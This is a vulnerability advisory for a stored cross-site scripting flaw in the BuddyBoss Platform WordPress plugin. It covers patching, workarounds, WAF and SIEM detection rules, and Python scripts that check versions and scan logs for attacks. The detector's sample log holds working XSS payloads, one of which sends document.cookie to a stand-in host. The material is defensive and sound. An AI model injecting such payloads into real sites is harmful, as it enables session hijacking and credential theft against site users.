CVE-2024-13859
📋 TL;DR
This vulnerability is a stored cross-site scripting (XSS) flaw in the BuddyBoss Platform WordPress plugin. An authenticated attacker with Subscriber-level access or higher can submit media content containing script that the plugin stores without sufficient sanitization and later renders without escaping; the script then runs in the browser of every user who views the affected page, enabling session hijacking, credential theft, or malware distribution. All WordPress sites running BuddyBoss Platform up to and including version 2.8.50 are affected.
💻 Affected Systems
- BuddyBoss Platform WordPress plugin, all versions up to and including 2.8.50
📦 What is this software?
BuddyBoss Platform is a WordPress plugin (a fork of BuddyPress) that turns a site into an online community, adding member profiles, activity feeds, groups, private messaging, and member-uploaded media such as photos and documents.
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, compromise user accounts, redirect users to malicious sites, or deploy malware across the entire WordPress site and its visitors.
Likely Case
Attackers with subscriber accounts inject malicious scripts to steal session cookies, redirect users to phishing pages, or deface website content.
If Mitigated
The fix in 2.8.51 (input sanitization plus output escaping) renders injected markup inert. If only the workarounds below are in place, a Subscriber can no longer reach the vulnerable media-save path, so the remaining exposure is limited to the accounts that are still allowed to upload media; a WAF alone narrows, but does not close, the injection route.
🎯 Exploit Status
Exploitation requires an authenticated account, and on many community sites Subscriber registration is open, so the barrier is low; once logged in, the injection itself is technically simple. Because this is stored XSS, the payload fires later, whenever a victim (ideally, from the attacker's point of view, an administrator) views the page. The vulnerability is publicly documented and weaponization is likely given how heavily WordPress plugins are targeted.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.8.51
Vendor Advisory: https://www.buddyboss.com/resources/buddyboss-platform-releases/2-8-51/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find BuddyBoss Platform.
4. Click 'Update Now' if an update is available.
5. If no update appears, download version 2.8.51 or later from the BuddyBoss website and update the plugin manually.
🔧 Temporary Workarounds
Disable Media Uploads for Subscribers
Restrict who can upload media so that low-privilege accounts cannot reach the vulnerable save handler. The simplest option needs no code: in the WordPress admin, go to BuddyBoss → Components and deactivate the Media component (or, under BuddyBoss → Settings → Media, turn off photo uploads for profiles and groups) until you can update.
If you would rather keep media enabled for trusted roles, unhook the AJAX handler for untrusted users. Note that the snippet originally given here, add_filter('bp_nouveau_ajax_media_save', '__return_false');, names a PHP function rather than a registered filter hook, so it has no effect. BuddyBoss's Nouveau template pack registers its AJAX callbacks on admin_init under short action names; assuming the handler is registered as wp_ajax_media_save (an assumption, verify it against your installed version), the following, added to the active theme's functions.php or a small mu-plugin, removes it for anyone below Editor:

add_action( 'admin_init', function () {
    // Subscribers and Contributors lack edit_others_posts; the handler stays in place for staff roles.
    if ( ! current_user_can( 'edit_others_posts' ) ) {
        remove_action( 'wp_ajax_media_save', 'bp_nouveau_ajax_media_save' );
    }
}, 99 ); // runs after BuddyBoss's own admin_init registration at the default priority

Remove Subscriber Role Media Permissions
Use a WordPress role management plugin to revoke media-related capabilities (upload_files and similar) from the Subscriber role. Treat this as defence in depth only: BuddyBoss gates member photo uploads through its own settings rather than solely through core capabilities, so confirm afterwards that a test Subscriber account can no longer save media.
🧯 If You Can't Patch
- Implement Web Application Firewall (WAF) rules for media-save requests to /wp-admin/admin-ajax.php. Match on the URL-decoded request body, case-insensitively, and cover event-handler attributes (onerror=, onload=) and javascript: URLs as well as a literal <script> tag; a rule that only matches <script> is trivially bypassed.
- Regularly audit user accounts and remove inactive or suspicious Subscriber-level accounts
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins → Buddyboss Platform version. If version is 2.8.50 or lower, you are vulnerable.
Check Version:
wp plugin list --name=buddyboss-platform --field=version
Verify Fix Applied:
After updating, verify version shows 2.8.51 or higher in WordPress plugins list.
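The checks above compare a version string against 2.8.50/2.8.51. Naive string comparison gets this wrong ("2.8.9" sorts after "2.8.51" as text), so the following added example, which is not part of the original page or of BuddyBoss's own tooling, parses the version numerically and wraps the wp-cli command shown above. The wp-cli invocation and the "buddyboss-platform" slug are taken from the page; the helper names and the handling of a pre-release suffix are this example's own assumptions.

```python
import re
import subprocess

PATCHED_VERSION = "2.8.51"  # first release carrying the fix, per the advisory above


def parse_version(text):
    """Turn '2.8.50' (or '2.8.50-beta1') into a tuple of ints for numeric comparison."""
    core = text.strip().split("-", 1)[0]  # drop a pre-release suffix (assumed format)
    if not re.fullmatch(r"\d+(\.\d+)*", core):
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in core.split("."))


def is_vulnerable(installed, patched=PATCHED_VERSION):
    """True when the installed BuddyBoss Platform version predates the fix."""
    return parse_version(installed) < parse_version(patched)


def assess(wp_cli_output):
    """Turn the stdout of `wp plugin list --name=buddyboss-platform --field=version` into a verdict."""
    version = wp_cli_output.strip()
    if not version:
        return "buddyboss-platform is not installed"
    state = "VULNERABLE" if is_vulnerable(version) else "patched"
    return f"buddyboss-platform {version}: {state} (fix in {PATCHED_VERSION})"


def main():
    # Runs the same wp-cli command shown above from the current WordPress root.
    result = subprocess.run(
        ["wp", "plugin", "list", "--name=buddyboss-platform", "--field=version"],
        capture_output=True, text=True, check=False,
    )
    print(assess(result.stdout))


if __name__ == "__main__":
    main()
```

Run it from the WordPress root as the web user (or with `--path=` added to the command); an empty result means wp-cli found no plugin with that slug, which this example reports rather than treating as patched.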
📡 Detection & Monitoring
Log Indicators:
- Unusual media upload activity from Subscriber accounts
- POST requests to /wp-admin/admin-ajax.php whose action parameter selects the media-save handler and whose other parameters contain HTML tags, event-handler attributes, or javascript: URLs. The action value given on this page, bp_nouveau_ajax_media_save, is the PHP callback name; BuddyBoss registers its Nouveau AJAX callbacks under short action names, so confirm the exact value seen on the wire (media_save is the likely form, but this is an assumption) against your installed version before writing a rule.
Network Indicators:
- Unexpected JavaScript payloads in media upload requests
- Increased admin-ajax.php requests from non-admin users
SIEM Query:
source="wordpress.log" AND uri_path="/wp-admin/admin-ajax.php" AND (parameters.action="bp_nouveau_ajax_media_save" OR parameters.action="media_save") AND (parameters.content CONTAINS "<script" OR parameters.content CONTAINS "javascript:" OR parameters.content CONTAINS "onerror=" OR parameters.content CONTAINS "onload=")
Field names such as parameters.content depend on your log schema. Match on the URL-decoded body, case-insensitively; otherwise the %3Cscript and <SCRIPT> variants are missed, and a literal "<script>" match alone ignores event-handler payloads entirely.
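The indicators and query above can be run offline against request logs. The following added example, not part of the original page and not BuddyBoss code, implements that detection over a constructed JSON-lines log: it selects admin-ajax.php requests whose action is either spelling of the media-save action, URL-decodes the parameters, flags any parameter matching the broader XSS markers discussed above (not just a literal <script>), and counts media-save calls per user so a burst from one Subscriber stands out. The log schema (ts, user, role, uri, params) and the sample lines are constructed for the example; the short action name "media_save" is an assumption.

```python
import json
import re
from collections import Counter
from urllib.parse import parse_qs

# Both spellings are matched: the page lists the callback name as the action
# value, while BuddyBoss's Nouveau template pack registers AJAX callbacks under
# short action names (assumed here to be "media_save").
MEDIA_SAVE_ACTIONS = {"media_save", "bp_nouveau_ajax_media_save"}

# A literal "<script>" is too narrow: stored XSS payloads routinely use
# event-handler attributes, javascript: URLs, or tags other than <script>.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"<\s*(svg|img|iframe|object|embed|math|body)\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),
]

# Constructed sample log (JSON lines). "params" holds the URL-encoded request
# parameters; admin-ajax.php reads `action` from GET or POST, so method is ignored.
SAMPLE_LOG = """
{"ts":"2025-03-01T10:00:01Z","user":"alice","role":"subscriber","uri":"/wp-admin/admin-ajax.php","params":"action=media_save&title=Holiday+photos&privacy=public"}
{"ts":"2025-03-01T10:00:07Z","user":"bob","role":"subscriber","uri":"/wp-admin/admin-ajax.php","params":"action=heartbeat&interval=60"}
{"ts":"2025-03-01T10:01:13Z","user":"mallory","role":"subscriber","uri":"/wp-admin/admin-ajax.php","params":"action=media_save&title=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&privacy=public"}
{"ts":"2025-03-01T10:01:40Z","user":"mallory","role":"subscriber","uri":"/wp-admin/admin-ajax.php","params":"action=bp_nouveau_ajax_media_save&description=%3CSCRIPT%3Elocation%3D%27https%3A%2F%2Fexample.invalid%2Fc%3F%27%2Bdocument.cookie%3C%2Fscript%3E"}
{"ts":"2025-03-01T10:02:02Z","user":"carol","role":"administrator","uri":"/wp-admin/admin-ajax.php","params":"action=media_save&title=Team+offsite"}
"""


def is_media_save_request(entry, params):
    """True for admin-ajax.php requests whose action selects the media-save handler."""
    return (entry.get("uri", "").endswith("/wp-admin/admin-ajax.php")
            and params.get("action", [""])[0] in MEDIA_SAVE_ACTIONS)


def suspicious_params(encoded):
    """Names of URL-encoded parameters whose decoded value matches an XSS marker."""
    hits = []
    for name, values in parse_qs(encoded, keep_blank_values=True).items():
        if name == "action":
            continue
        if any(p.search(v) for v in values for p in XSS_PATTERNS):
            hits.append(name)
    return hits


def scan(log_lines):
    """Return (alerts, media_save_count_per_user) for an iterable of JSON log lines."""
    alerts = []
    per_user = Counter()
    for raw in log_lines:
        raw = raw.strip()
        if not raw:
            continue
        entry = json.loads(raw)
        encoded = entry.get("params", "")
        params = parse_qs(encoded, keep_blank_values=True)
        if not is_media_save_request(entry, params):
            continue
        per_user[entry.get("user", "anonymous")] += 1  # volume baseline per account
        hits = suspicious_params(encoded)
        if hits:
            alerts.append({"ts": entry.get("ts"), "user": entry.get("user"),
                           "role": entry.get("role"), "params": hits})
    return alerts, per_user


if __name__ == "__main__":
    found, counts = scan(SAMPLE_LOG.splitlines())
    for alert in found:
        print(f"{alert['ts']} {alert['user']} ({alert['role']}): payload in {alert['params']}")
    print("media-save calls per user:", dict(counts))
```

The second mallory line uses an upper-case SCRIPT tag and the first uses an img/onerror payload with no script tag at all; both are caught, while the benign titles from alice and carol are not. Feed real logs by replacing SAMPLE_LOG with the decoded request bodies your access log or WAF exports, keeping the same field names.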